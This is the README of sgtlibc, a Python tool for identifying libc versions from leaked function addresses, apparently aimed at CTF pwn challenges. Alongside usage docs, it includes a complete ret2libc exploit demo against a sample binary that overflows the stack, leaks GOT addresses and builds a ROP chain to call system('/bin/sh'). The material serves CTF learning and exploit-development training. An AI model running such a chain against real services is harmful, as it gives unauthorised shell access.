sgtlibc 1.12.183

a offline python-lib for search libc function.for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`

What?

sgtlibc is a a offline python-lib for search libc function.

Install

pip install sgtlibc

Usage

usage: main.py [-h] [-d [DUMP ...]] [-i [INDEX]] [-u [UPDATE]] [funcs_with_addresses]

for search version of libc.you can use like:`sgtlibc puts:aa0+read:140 --dump system binsh` or in python , like : `py:import sgtlibc;s = sgtlibc.LibcSearcher();s.add_condition('puts',0xaa0)`

positional arguments:
  funcs_with_addresses  specify `func-name` and `func address` , split by `|`,eg: puts:aa0+read:140 , its means func-put's address = 0xaa0;func-read addr = 0x140 (default: None).

options:
  -h, --help            show this help message and exit
  -d [DUMP ...], --dump [DUMP ...]
                        select funcs to dump its info (default: ['__libc_start_main_ret', 'system', 'dup2', 'read', 'write', 'str_bin_sh']).
  -i [INDEX], --index [INDEX]
                        db index on multi-database found occation (default: 0).
  -u [UPDATE], --update [UPDATE]
                        update current libc database from internet , need non-microsoft-windows environment (default: False).

Quick Start

• in cmd.exeor/bin/sh`

sgtlibc puts:aa0
sgtlibc puts:aa0+read:140
sgtlibc puts:aa0+read:140 --dump system binsh

• in python3

import sgtlibc
s = sgtlibc.Searcher()
s.add_condition('puts', 0xaa0)
s.add_condition('read',0x140)
print(s.dump())
print(s.dump(['system','str_bin_sh']))

Example

• main args specify func-name and func address ,**SHOULD split by | **

  eg: puts:aa0+read:140 which means:

  • func-puts address = 0xaa0
  • func-read address = 0x140

• --update is for update libc database from internet base on libc-database , require non-microsoft-window system

• run [python code above](/#/Quick Start) , you'll get output-result like following shows:

• run command in terminal , you'll get output-result like following shows:

  

• use in pwntools

from pwn import * # should run pip install pwntools before
import sgtlibc
s = libc.Searcher()
puts_addr = 0xff1234567aa0 # from leak data
s.add_condition('puts',puts_addr)
libc = s.dump() # search libc , if returns multi-result ,default use index-0's result
offset = puts_addr - libc[sgtlibc.s_puts]  # puts_write
system_addr = p64(libc[sgtlibc.s_system] + offset)
binsh_addr = p64(libc[sgtlibc.s_binsh] + offset)

CTF Problem Solve DEMO

view all sameple files

• use exploit code

import sgtlibc
from sgtlibc.gamebox import *
set_config(GameBoxConfig(
    is_local=True, file='./babyrop2', remote='192.168.0.1:25462',
    auto_load=True,
    auto_show_rop=True,
    auto_show_summary=True,
    auto_start_game=True,
    auto_load_shell_str=True,
    auto_show_symbols=True
))
s = sgtlibc.Searcher()
elf = client.elf
payload_exp = b'a' * (28 + 4) + p00(0xdeadbeef)  # overflow position
def leak(func: str):
    payload = payload_exp + p00(elf.rop['rdi']) + p00(elf.got[func]) + \
        p00(elf.plt['printf']) + p00(elf.symbols['main'])
    sl(payload)
    rl()
    data = rc(6).ljust(8, b'\0')
    data = uc(data)
    s.add_condition(func, data)
    return data
leak('printf')
leak('read')
data = s.dump(db_index=2)  # choose your system index
system_addr = s.get_address(sgtlibc.s_system)
binsh_addr = s.get_address(sgtlibc.s_binsh)
log.info(f'system_addr:{hex(system_addr)}')
log.info(f'binsh_addr:{hex(binsh_addr)}')
payload = payload_exp + p00(elf.rop['rdi']) + p00(binsh_addr) + \
    p00(system_addr) + p00(0xdeadbeef)
sl(payload)
interactive()

• result

Notice

default libc database is update long-time ago , we fully recommanded to update it by run sgtlibc --update

Status